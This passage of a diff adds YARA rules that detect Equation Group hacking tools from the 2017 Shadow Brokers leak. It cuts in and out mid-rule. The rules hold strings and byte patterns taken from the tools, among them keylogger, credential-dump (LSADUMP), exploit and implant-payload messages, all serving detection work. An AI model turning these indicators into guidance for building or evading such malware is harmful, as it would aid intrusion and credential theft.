+      date = "2017-04-15 18:11:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "f67214083d60f90ffd16b89a0ce921c98185b2032874174691b720514b1fe99e"
+      tags = "APT, DEMO, EXE, FILE"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "driver start" fullword ascii
+      $s2 = "DeviceIoControl Error: %d" fullword ascii
+      $s3 = "Phlook" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 300KB and all of them )
+}
+
+rule EquationGroup_Toolset_Apr17_SetOurAddr_RID35D3 : APT DEMO EXE FILE {
+   meta:
+      description = "Detects EquationGroup Tool - April Leak"
+      author = "Florian Roth"
+      reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+      date = "2017-04-15 16:29:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "04ccc060d401ddba674371e66e0288ebdbfa7df74b925c5c202109f23fb78504"
+      tags = "APT, DEMO, EXE, FILE"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "USAGE: SetOurAddr <input file> <output file> <protocol> [IP/IPX address]" fullword ascii
+      $s2 = "Replaced default IP address (127.0.0.1) with Local IP Address %d.%d.%d.%d" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 100KB and 1 of them )
+}
+
+rule EquationGroup_Toolset_Apr17_SendPKTrigger_RID36EF : APT DEMO EXE FILE {
+   meta:
+      description = "Detects EquationGroup Tool - April Leak"
+      author = "Florian Roth"
+      reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+      date = "2017-04-15 17:17:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "2f9c7a857948795873a61f4d4f08e1bd0a41e3d6ffde212db389365488fa6e26"
+      tags = "APT, DEMO, EXE, FILE"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "----====**** PORT KNOCK TRIGGER BEGIN ****====----" fullword wide
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 300KB and all of them )
+}
+
+rule EquationGroup_Toolset_Apr17_DmGz_Target_2_RID36BF : APT DEMO EXE FILE {
+   meta:
+      description = "Detects EquationGroup Tool - April Leak"
+      author = "Florian Roth"
+      reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+      date = "2017-04-15 17:09:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "55ac29b9a67e0324044dafaba27a7f01ca3d8e4d8e020259025195abe42aa904"
+      tags = "APT, DEMO, EXE, FILE"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "\\\\.\\%ls" fullword ascii
+      $op0 = { e8 ce 34 00 00 b8 02 00 00 f0 e9 26 02 00 00 48 } 
+      $op1 = { 8b 4d 28 e8 02 05 00 00 89 45 34 eb 07 c7 45 34 } 
+      $op2 = { e8 c2 34 00 00 90 48 8d 8c 24 00 01 00 00 e8 a4 } 
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 100KB and all of them )
+}
+
+rule EquationGroup_Toolset_Apr17_regprobe_RID354C : APT DEMO EXE FILE {
+   meta:
+      description = "Detects EquationGroup Tool - April Leak"
+      author = "Florian Roth"
+      reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+      date = "2017-04-15 16:07:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "99a42440d4cf1186aad1fd09072bd1265e7c6ebbc8bcafc28340b4fe371767de"
+      tags = "APT, DEMO, EXE, FILE"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "Usage: %s targetIP protocolSequence portNo [redirectorIP] [CLSID]" fullword ascii
+      $x2 = "key does not exist or pinging w2k system" fullword ascii
+      $x3 = "RpcProxy=255.255.255.255:65536" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 100KB and 1 of them )
+}
+
+rule EquationGroup_Toolset_Apr17_DoubleFeatureDll_dll_2_RID3A65 : APT DEMO EXE FILE {
+   meta:
+      description = "Detects EquationGroup Tool - April Leak"
+      author = "Florian Roth"
+      reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+      date = "2017-04-15 19:44:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "f265defd87094c95c7d3ddf009d115207cd9d4007cf98629e814eda8798906af"
+      hash2 = "8d62ca9e6d89f2b835d07deb5e684a576607e4fe3740f77c0570d7b16ebc2985"
+      hash3 = "634a80e37e4b32706ad1ea4a2ff414473618a8c42a369880db7cc127c0eb705e"
+      tags = "APT, DEMO, EXE, FILE"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = ".dllfD" fullword ascii
+      $s2 = "Khsppxu" fullword ascii
+      $s3 = "D$8.exe" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 1000KB and 2 of them )
+}
+
+rule EquationGroup_Toolset_Apr17_SetCallbackPorts_RID3847 : APT DEMO EXE FILE {
+   meta:
+      description = "Detects EquationGroup Tool - April Leak"
+      author = "Florian Roth"
+      reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+      date = "2017-04-15 18:14:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "16f66c2593665c2507a78f96c0c2a9583eab0bda13a639e28f550c92f9134ff0"
+      tags = "APT, DEMO, EXE, FILE"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "USAGE: %s <input file> <output file> <port1> [port2] [port3] [port4] [port5] [port6]" fullword ascii
+      $s2 = "You may enter between 1 and 6 ports to change the defaults." fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 100KB and 1 of them )
+}
+
+rule EquationGroup_Toolset_Apr17_DiBa_Target_BH_2000_RID3816 : APT DEMO EXE FILE {
+   meta:
+      description = "Detects EquationGroup Tool - April Leak"
+      author = "Florian Roth"
+      reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+      date = "2017-04-15 18:06:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "0654b4b8727488769390cd091029f08245d690dd90d1120e8feec336d1f9e788"
+      tags = "APT, DEMO, EXE, FILE"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s2 = "0M1U1Z1p1" fullword ascii
+      $s14 = "SPRQWV" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 2000KB and all of them )
+}
+
+rule EquationGroup_Toolset_Apr17_rc5_RID3300 : APT DEMO EXE FILE {
+   meta:
+      description = "Detects EquationGroup Tool - April Leak"
+      author = "Florian Roth"
+      reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+      date = "2017-04-15 14:29:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "69e2c68c6ea7be338497863c0c5ab5c77d5f522f0a84ab20fe9c75c7f81318eb"
+      tags = "APT, DEMO, EXE, FILE"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "Usage: %s [d|e] session_key ciphertext" fullword ascii
+      $s2 = "where session_key and ciphertext are strings of hex" fullword ascii
+      $s3 = "d = decrypt mode, e = encrypt mode" fullword ascii
+      $s4 = "Bad mode, should be 'd' or 'e'" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 200KB and 2 of them )
+}
+
+rule EquationGroup_Toolset_Apr17_PC_Level_Generic_RID37FC : APT DEMO EXE FILE GEN {
+   meta:
+      description = "Detects EquationGroup Tool - April Leak"
+      author = "Florian Roth"
+      reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+      date = "2017-04-15 18:01:51"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "7a6488dd13936e505ec738dcc84b9fec57a5e46aab8aff59b8cfad8f599ea86a"
+      hash2 = "0e3cfd48732d0b301925ea3ec6186b62724ec755ed40ed79e7cd6d3df511b8a0"
+      hash3 = "d1d6e3903b6b92cc52031c963e2031b5956cadc29cc8b3f2c8f38be20f98a4a7"
+      tags = "APT, DEMO, EXE, FILE, GEN"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "wshtcpip.WSHGetSocketInformation" fullword ascii
+      $s2 = "\\\\.\\%hs" fullword ascii
+      $s3 = ".?AVResultIp@Mini_Mcl_Cmd_NetConnections@@" fullword ascii
+      $s4 = "Corporation. All rights reserved." fullword wide
+      $s5 = { 49 83 3c 24 00 75 02 eb 5d 49 8b 34 24 0f b7 46 } 
+      $op1 = { 44 24 57 6f c6 44 24 58 6e c6 44 24 59 } 
+      $op2 = { c6 44 24 56 64 88 5c 24 57 } 
+      $op3 = { 44 24 6d 4c c6 44 24 6e 6f c6 44 24 6f } 
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 400KB and ( 2 of ( $s* ) or all of ( $op* ) )
+}
+
+rule EquationGroup_Toolset_Apr17_PC_Level3_http_exe_RID38D3 : APT DEMO EXE FILE {
+   meta:
+      description = "Detects EquationGroup Tool - April Leak"
+      author = "Florian Roth"
+      reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+      date = "2017-04-15 18:37:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "3e855fbea28e012cd19b31f9d76a73a2df0eb03ba1cb5d22aafe9865150b020c"
+      tags = "APT, DEMO, EXE, FILE"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "Copyright (C) Microsoft" fullword wide
+      $op1 = { 24 39 65 c6 44 24 3a 6c c6 44 24 3b 65 c6 44 24 } 
+      $op2 = { 44 24 4e 41 88 5c 24 4f ff } 
+      $op3 = { 44 24 3f 6e c6 44 24 40 45 c6 44 24 41 } 
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 400KB and all of them )
+}
+
+rule EquationGroup_Toolset_Apr17_ParseCapture_RID36C5 : APT DEMO EXE FILE {
+   meta:
+      description = "Detects EquationGroup Tool - April Leak"
+      author = "Florian Roth"
+      reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+      date = "2017-04-15 17:10:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "c732d790088a4db148d3291a92de5a449e409704b12e00c7508d75ccd90a03f2"
+      tags = "APT, DEMO, EXE, FILE"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "* Encrypted log found.  An encryption key must be provided" fullword ascii
+      $x2 = "encryptionkey = e.g., \"00 11 22 33 44 55 66 77 88 99 aa bb cc dd ee ff\"" fullword ascii
+      $x3 = "Decrypting with key '%02x %02x %02x %02x %02x %02x %02x %02x %02x %02x %02x %02x %02x %02x %02x %02x'" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 50KB and 1 of them )
+}
+
+rule EquationGroup_Toolset_Apr17_ActiveDirectory_Target_RID3ACD : APT DEMO EXE FILE {
+   meta:
+      description = "Detects EquationGroup Tool - April Leak"
+      author = "Florian Roth"
+      reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+      date = "2017-04-15 20:02:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "33c1b7fdee7c70604be1e7baa9eea231164e62d5d5090ce7f807f43229fe5c36"
+      tags = "APT, DEMO, EXE, FILE"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "(&(objectCategory=person)(objectClass=user)(cn=" fullword wide
+      $s2 = "(&(objectClass=user)(objectCategory=person)" fullword wide
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 200KB and all of them )
+}
+
+rule EquationGroup_Toolset_Apr17_PC_Legacy_dll_RID36D8 : APT DEMO EXE FILE HIGHVOL {
+   meta:
+      description = "Detects EquationGroup Tool - April Leak"
+      author = "Florian Roth"
+      reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+      date = "2017-04-15 17:13:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "0cbc5cc2e24f25cb645fb57d6088bcfb893f9eb9f27f8851503a1b33378ff22d"
+      tags = "APT, DEMO, EXE, FILE, HIGHVOL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $op1 = { 45 f4 65 c6 45 f5 6c c6 45 f6 33 c6 45 f7 32 c6 } 
+      $op2 = { 49 c6 45 e1 73 c6 45 e2 57 c6 45 e3 } 
+      $op3 = { 34 c6 45 e7 50 c6 45 e8 72 c6 45 e9 6f c6 45 ea } 
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 200KB and all of them )
+}
+
+rule EquationGroup_Toolset_Apr17_svctouch_RID3565 : APT DEMO EXE FILE {
+   meta:
+      description = "Detects EquationGroup Tool - April Leak"
+      author = "Florian Roth"
+      reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+      date = "2017-04-15 16:11:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "96b6a3c4f53f9e7047aa99fd949154745e05dc2fd2eb21ef6f0f9b95234d516b"
+      tags = "APT, DEMO, EXE, FILE"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "Causes: Firewall,Machine down,DCOM disabled\\not supported,etc." fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 10KB and 1 of them )
+}
+
+rule EquationGroup_Toolset_Apr17_pwd_Implant_RID3675 : APT DEMO EXE FILE {
+   meta:
+      description = "Detects EquationGroup Tool - April Leak"
+      author = "Florian Roth"
+      reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+      date = "2017-04-15 16:56:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "ee72ac76d82dfec51c8fbcfb5fc99a0a45849a4565177e01d8d23a358e52c542"
+      tags = "APT, DEMO, EXE, FILE"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "7\"7(7/7>7O7]7o7w7" fullword ascii
+      $op1 = { 40 50 89 44 24 18 FF 15 34 20 00 } 
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 20KB and 1 of them )
+}
+
+rule EquationGroup_Toolset_Apr17_KisuComms_Target_2000_RID3978 : APT DEMO EXE FILE {
+   meta:
+      description = "Detects EquationGroup Tool - April Leak"
+      author = "Florian Roth"
+      reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+      date = "2017-04-15 19:05:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "94eea1bad534a1dc20620919de8046c9966be3dd353a50f25b719c3662f22135"
+      tags = "APT, DEMO, EXE, FILE"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "363<3S3c3l3q3v3{3" fullword ascii
+      $s2 = "3!3%3)3-3135393@5" fullword ascii
+      $op0 = { eb 03 89 46 54 47 83 ff 1a 0f 8c 40 ff ff ff 8b } 
+      $op1 = { 8b 46 04 85 c0 74 0f 50 e8 34 fb ff ff 83 66 04 } 
+      $op2 = { c6 45 fc 02 8d 8d 44 ff ff ff e8 d2 2f 00 00 eb } 
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 200KB and ( all of ( $s* ) or all of ( $op* ) ) )
+}
+
+rule EquationGroup_Toolset_Apr17_SlDecoder_RID356B : APT DEMO EXE FILE {
+   meta:
+      description = "Detects EquationGroup Tool - April Leak"
+      author = "Florian Roth"
+      reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+      date = "2017-04-15 16:12:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "b220f51ca56d9f9d7d899fa240d3328535f48184d136013fd808d8835919f9ce"
+      tags = "APT, DEMO, EXE, FILE"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "Error in conversion. SlDecoder.exe <input filename> <output filename> at command line " fullword wide
+      $x2 = "KeyLogger_Data" fullword wide
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 200KB and 1 of them )
+}
+
+rule EquationGroup_Toolset_Apr17_Windows_Implant_RID3815 : APT DEMO EXE FILE {
+   meta:
+      description = "Detects EquationGroup Tool - April Leak"
+      author = "Florian Roth"
+      reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+      date = "2017-04-15 18:06:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "d38ce396926e45781daecd18670316defe3caf975a3062470a87c1d181a61374"
+      tags = "APT, DEMO, EXE, FILE"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s2 = "0#0)0/050;0M0Y0h0|0" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 50KB and all of them )
+}
+
+rule EquationGroup_Toolset_Apr17_msgkd_msslu64_msgki_mssld_RID3C05 : APT DEMO EXE FILE {
+   meta:
+      description = "Detects EquationGroup Tool - April Leak"
+      author = "Florian Roth"
+      reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+      date = "2017-04-15 20:54:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "9ab667b7b5b9adf4ff1d6db6f804824a22c7cc003eb4208d5b2f12809f5e69d0"
+      hash2 = "320144a7842500a5b69ec16f81a9d1d4c8172bb92301afd07fb79bc0eca81557"
+      hash3 = "c10f4b9abee0fde50fe7c21b9948a2532744a53bb4c578630a81d2911f6105a3"
+      tags = "APT, DEMO, EXE, FILE"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "PQRAPAQSTUVWARASATAUAVAW" fullword ascii
+      $s2 = "SQRUWVAWAVAUATASARAQAP" fullword ascii
+      $s3 = "iijymqp" fullword ascii
+      $s4 = "AWAVAUATASARAQI" fullword ascii
+      $s5 = "WARASATAUAVM" fullword ascii
+      $op1 = { 0c 80 30 02 48 83 c2 01 49 83 e9 01 75 e1 c3 cc } 
+      $op2 = { e8 10 66 0d 00 80 66 31 02 48 83 c2 02 49 83 e9 } 
+      $op3 = { 48 b8 53 a5 e1 41 d4 f1 07 00 48 33 } 
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 1000KB and 2 of ( $s* ) or all of ( $op* ) )
+}
+
+rule EquationGroup_Toolset_Apr17_SetCallback_RID362F : APT DEMO EXE FILE {
+   meta:
+      description = "Detects EquationGroup Tool - April Leak"
+      author = "Florian Roth"
+      reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+      date = "2017-04-15 16:45:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "a8854f6b01d0e49beeb2d09e9781a6837a0d18129380c6e1b1629bc7c13fdea2"
+      tags = "APT, DEMO, EXE, FILE"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s2 = "*NOTE: This version of SetCallback does not work with PeddleCheap versions prior" fullword ascii
+      $s3 = "USAGE: SetCallback <input file> <output file>" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 100KB and all of them )
+}
+
+rule EquationGroup_Toolset_Apr17__vtuner_vtuner_1_RID388C : APT DEMO EXE FILE {
+   meta:
+      description = "Detects EquationGroup Tool - April Leak"
+      author = "Florian Roth"
+      reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+      date = "2017-04-15 18:25:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "3e6bec0679c1d8800b181f3228669704adb2e9cbf24679f4a1958e4cdd0e1431"
+      hash2 = "b0d2ebf455092f9d1f8e2997237b292856e9abbccfbbebe5d06b382257942e0e"
+      tags = "APT, DEMO, EXE, FILE"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "Unable to get -w hash.  %x" fullword wide
+      $s2 = "!\"invalid instruction mnemonic constant Id3vil\"" fullword wide
+      $s4 = "Unable to set -w provider. %x" fullword wide
+      $op0 = { 2b c7 50 e8 3a 8c ff ff ff b6 c0 } 
+      $op2 = { a1 8c 62 47 00 81 65 e0 ff ff ff 7f 03 d8 8b c1 } 
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 2000KB and 2 of them )
+}
+
+rule EquationGroup_Toolset_Apr17__ecwi_ESKE_EVFR_RPC2_2_RID391D : APT DEMO EXE FILE {
+   meta:
+      description = "Detects EquationGroup Tool - April Leak"
+      author = "Florian Roth"
+      reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+      date = "2017-04-15 18:50:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "c4152f65e45ff327dade50f1ac3d3b876572a66c1ce03014f2877cea715d9afd"
+      hash2 = "9d16d97a6c964e0658b6cd494b0bbf70674bf37578e2ff32c4779a7936e40556"
+      hash3 = "c5e119ff7b47333f415aea1d2a43cb6cb322f8518562cfb9b90399cac95ac674"
+      tags = "APT, DEMO, EXE, FILE"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "Target is share name" fullword ascii
+      $s2 = "Could not make UdpNetbios header -- bailing" fullword ascii
+      $s3 = "Request non-NT session key" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 2000KB and all of them )
+}
+
+rule EquationGroup_Toolset_Apr17__EAFU_ecwi_ESKE_EVFR_RPC2_4_RID3A9F : APT DEMO EXE FILE {
+   meta:
+      description = "Detects EquationGroup Tool - April Leak"
+      author = "Florian Roth"
+      reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+      date = "2017-04-15 19:54:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "3e181ca31f1f75a6244b8e72afaa630171f182fbe907df4f8b656cc4a31602f6"
+      hash2 = "c4152f65e45ff327dade50f1ac3d3b876572a66c1ce03014f2877cea715d9afd"
+      hash3 = "9d16d97a6c964e0658b6cd494b0bbf70674bf37578e2ff32c4779a7936e40556"
+      tags = "APT, DEMO, EXE, FILE"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "* Listening Post DLL %s() returned error code %d." fullword ascii
+      $s1 = "WsaErrorTooManyProcesses" fullword ascii
+      $s2 = "NtErrorMoreProcessingRequired" fullword ascii
+      $s3 = "Connection closed by remote host (TCP Ack/Fin)" fullword ascii
+      $s4 = "ServerErrorBadNamePassword" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 2000KB and all of ( $s* ) or 1 of ( $x* ) )
+}
+
+rule EquationGroup_Toolset_Apr17__SendCFTrigger_SendPKTrigger_6_RID3D29 : APT DEMO EXE FILE {
+   meta:
+      description = "Detects EquationGroup Tool - April Leak"
+      author = "Florian Roth"
+      reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+      date = "2017-04-15 21:42:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "3bee31b9edca8aa010a4684c2806b0ca988b2bcc14ad0964fec4f11f3f6fb748"
+      hash2 = "2f9c7a857948795873a61f4d4f08e1bd0a41e3d6ffde212db389365488fa6e26"
+      tags = "APT, DEMO, EXE, FILE"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s4 = "* Failed to connect to destination - %u" fullword wide
+      $s6 = "* Failed to convert destination address into sockaddr_storage values" fullword wide
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 400KB and 1 of them )
+}
+
+rule EquationGroup_Toolset_Apr17__AddResource_RID36A6 : APT DEMO EXE FILE {
+   meta:
+      description = "Detects EquationGroup Tool - April Leak"
+      author = "Florian Roth"
+      reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+      date = "2017-04-15 17:04:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "e83e4648875d4c4aa8bc6f3c150c12bad45d066e2116087cdf78a4a4efbab6f0"
+      hash2 = "5a04d65a61ef04f5a1cbc29398c767eada367459dc09c54c3f4e35015c71ccff"
+      tags = "APT, DEMO, EXE, FILE"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "%s cm 10 2000 \"c:\\MY DIR\\myapp.exe\" c:\\MyResourceData.dat" fullword ascii
+      $s2 = "<PE path> - the path to the PE binary to which to add the resource." fullword ascii
+      $s3 = "Unable to get path for target binary." fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 300KB and 2 of them )
+}
+
+rule EquationGroup_Toolset_Apr17__ESKE_RPC2_8_RID358A : APT DEMO EXE FILE {
+   meta:
+      description = "Detects EquationGroup Tool - April Leak"
+      author = "Florian Roth"
+      reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+      date = "2017-04-15 16:17:31"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "9d16d97a6c964e0658b6cd494b0bbf70674bf37578e2ff32c4779a7936e40556"
+      hash2 = "5c0896dbafc5d8cc19b1bc7924420b20ed5999ac5bee2cb5a91aada0ea01e337"
+      tags = "APT, DEMO, EXE, FILE"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s4 = "Fragment: Packet too small to contain RPC header" fullword ascii
+      $s5 = "Fragment pickup: SmbNtReadX failed" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 700KB and 1 of them )
+}
+
+rule EquationGroup_Toolset_Apr17__LSADUMP_Lp_ModifyPrivilege_Lp_PacketScan_Lp_put_Lp_RemoteExecute_Lp_Windows_Lp_wmi_Lp_9_RID53B6 : APT DEMO EXE FILE {
+   meta:
+      description = "Detects EquationGroup Tool - April Leak"
+      author = "Florian Roth"
+      reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+      date = "2017-04-15 09:10:30"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "c7bf4c012293e7de56d86f4f5b4eeb6c1c5263568cc4d9863a286a86b5daf194"
+      hash2 = "d92928a867a685274b0a74ec55c0b83690fca989699310179e184e2787d47f48"
+      hash3 = "2d963529e6db733c5b74db1894d75493507e6e40da0de2f33e301959b50f3d32"
+      tags = "APT, DEMO, EXE, FILE"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "Injection Lib -  " wide
+      $x2 = "LSADUMP - - ERROR" wide
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 300KB and 1 of them )
+}
+
+rule EquationGroup_Toolset_Apr17__ETBL_ETRE_10_RID35CB : APT DEMO EXE FILE {
+   meta:
+      description = "Detects EquationGroup Tool - April Leak"
+      author = "Florian Roth"
+      reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+      date = "2017-04-15 16:28:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "70db3ac2c1a10de6ce6b3e7a7890c37bffde006ea6d441f5de6d8329add4d2ef"
+      hash2 = "e0f05f26293e3231e4e32916ad8a6ee944af842410c194fce8a0d8ad2f5c54b2"
+      tags = "APT, DEMO, EXE, FILE"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "Probe #2 usage: %s -i TargetIp -p TargetPort -r %d [-o TimeOut] -t Protocol -n IMailUserName -a IMailPassword" fullword ascii
+      $x6 = "** RunExploit ** - EXCEPTION_EXECUTE_HANDLER : 0x%08X" fullword ascii
+      $s19 = "Sending Implant Payload.. cEncImplantPayload size(%d)" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 200KB and 1 of them )
+}
+
+rule EquationGroup_Toolset_Apr17__ELV_ESKE_ETBL_ETRE_EVFR_11_RID3A2B : APT DEMO EXE FILE {
+   meta:
+      description = "Detects EquationGroup Tool - April Leak"
+      author = "Florian Roth"
+      reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+      date = "2017-04-15 19:35:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "f7fad44560bc8cc04f03f1d30b6e1b4c5f049b9a8a45464f43359cbe4d1ce86f"
